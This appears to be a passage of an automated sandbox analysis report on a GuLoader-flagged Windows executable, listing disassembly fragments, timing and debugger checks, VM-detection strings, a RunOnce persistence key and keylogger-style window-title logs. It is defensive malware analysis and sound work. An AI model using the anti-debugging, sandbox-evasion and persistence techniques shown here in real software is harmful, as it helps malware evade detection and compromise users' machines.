0x00000083 pushad 0x00000084 mov ebx, 000000A7h 0x00000089 rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
RDTSC instruction interceptor: First address: 0000000000565E68 second address: 0000000000569606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ecx 0x00000004 mov ecx, dword ptr [ebp+000001D9h] 0x0000000a mov dword ptr [ebp+00000212h], ecx 0x00000010 mov ecx, eax 0x00000012 push ecx 0x00000013 mov ecx, dword ptr [ebp+00000212h] 0x00000019 push dword ptr [ebp+000000D0h] 0x0000001f call 00007F7648790371h 0x00000024 call 00007F764878CCF5h 0x00000029 pop ebx 0x0000002a sub ebx, 05h 0x0000002d mov dword ptr [ebp+0000014Ch], edi 0x00000033 jmp 00007F764878CDD9h 0x00000038 pushad 0x00000039 mov esi, 00000069h 0x0000003e rdtsc |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 6084 |
Thread sleep time: -35000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548 |
Thread sleep count: 250 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548 |
Thread sleep time: -125000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5328 |
Thread sleep time: -30000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Last function: Thread delayed |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Last function: Thread delayed |
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\ANNONCEKAMPAGNE.exe\ROGUYSoftware\Microsoft\Windows\CurrentVersion\RunOnceOTATE |
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\ANNONCEKAMPAGNE.exe\ROGUYSet W = CreateObject("WScript.Shell") |
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp |
Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Thread information set: HideFromDebugger |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022664DD LdrInitializeThunk, |
1_2_022664DD |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022685F4 mov eax, dword ptr fs:[00000030h] |
1_2_022685F4 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267874 mov eax, dword ptr fs:[00000030h] |
1_2_02267874 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267879 mov eax, dword ptr fs:[00000030h] |
1_2_02267879 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022654A8 mov eax, dword ptr fs:[00000030h] |
1_2_022654A8 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02262D2C mov eax, dword ptr fs:[00000030h] |
1_2_02262D2C |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_02267377 mov eax, dword ptr fs:[00000030h] |
1_2_02267377 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Code function: 1_2_022637C8 mov eax, dword ptr fs:[00000030h] |
1_2_022637C8 |
Source: C:\Users\user\Desktop\JXblq0dqPN.exe |
Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe' |
Jump to behavior |
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp |
Binary or memory string: uProgram Manager |
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp |
Binary or memory string: Progman |
Source: logs.dat.17.dr |
Binary or memory string: [ Program Manager ] |
Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmp |
Binary or memory string: Progmanlock |
Source: Initial file |
Signature Results: GuLoader behavior |